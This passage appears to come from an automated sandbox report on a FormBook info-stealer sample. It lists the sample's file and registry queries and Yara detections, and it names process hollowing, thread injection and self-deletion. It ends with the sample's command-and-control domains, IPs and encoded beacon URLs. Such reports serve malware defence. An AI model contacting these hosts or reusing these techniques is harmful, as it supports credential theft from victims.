Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562118 Sample: tlBHrCrteFXy8Jz.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 31 www.madeitinhome.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 8 other signatures 2->45 11 tlBHrCrteFXy8Jz.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\tlBHrCrteFXy8Jz.exe.log, ASCII 11->29 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 59 Injects a PE file into a foreign processes 11->59 15 tlBHrCrteFXy8Jz.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.thietkenoithatvanphong.asia 222.255.46.12, 49821, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 18->33 35 desertbirdmercantile.com 162.241.24.116, 49805, 80 UNIFIEDLAYER-AS-1US United States 18->35 37 4 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 explorer.exe 18->22         started        signatures11 process12 signatures13 49 Self deletion via cmd delete 22->49 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
222.255.46.12
 www.thietkenoithatvanphong.asia Viet Nam
45899 VNPT-AS-VNVNPTCorpVN true
162.241.24.116
 desertbirdmercantile.com United States
46606 UNIFIEDLAYER-AS-1US true
160.153.136.3
 sigmamu.com United States
21501 GODADDY-AMSDE true
154.214.67.82
 www.yzztx.com Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK true

Contacted Domains

Name IP Active
www.thietkenoithatvanphong.asia 222.255.46.12 true
www.madeitinhome.com 23.230.105.134 true
sigmamu.com 160.153.136.3 true
www.yzztx.com 154.214.67.82 true
desertbirdmercantile.com 162.241.24.116 true
www.desertbirdmercantile.com unknown unknown
www.sigmamu.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.yzztx.com/b3xd/?qPYT=aV9tZ&iRah=u1+lAjLBA2+kcdvhq4UZu/nPbWuE94hnVKEDKIE9CxGJPgk2ISTbeIcckL5CyvhDdyZbFg7D5w== true
  • Avira URL Cloud: safe
 unknown
http://www.sigmamu.com/b3xd/?iRah=5GWj3iokSHma3YiDoT3m16TCcfPCT77oIBdOELLk89ETJqvKsRjgRlGfGSz2uWFXBl65BQRHGg==&qPYT=aV9tZ true
  • Avira URL Cloud: safe
 unknown
www.meizi.ltd/b3xd/ true
  • Avira URL Cloud: malware
 low
http://www.desertbirdmercantile.com/b3xd/?qPYT=aV9tZ&iRah=Ie1PhgByqbmAnBTD/2NTTWN841CMZzf2VbgiXa4AsIuYcZI/bp6cv0uoISKMiipyVSmV9CFFiA== true
  • Avira URL Cloud: safe
 unknown
http://www.thietkenoithatvanphong.asia/b3xd/?iRah=JdJx4d7W9+IGJje0hU/QcPoKaGdRUKvyvIN3jQdk7kxI7FpVQbo1IF0KYDc1cvBgS1iZcvDTaA==&qPYT=aV9tZ true
  • Avira URL Cloud: safe
 unknown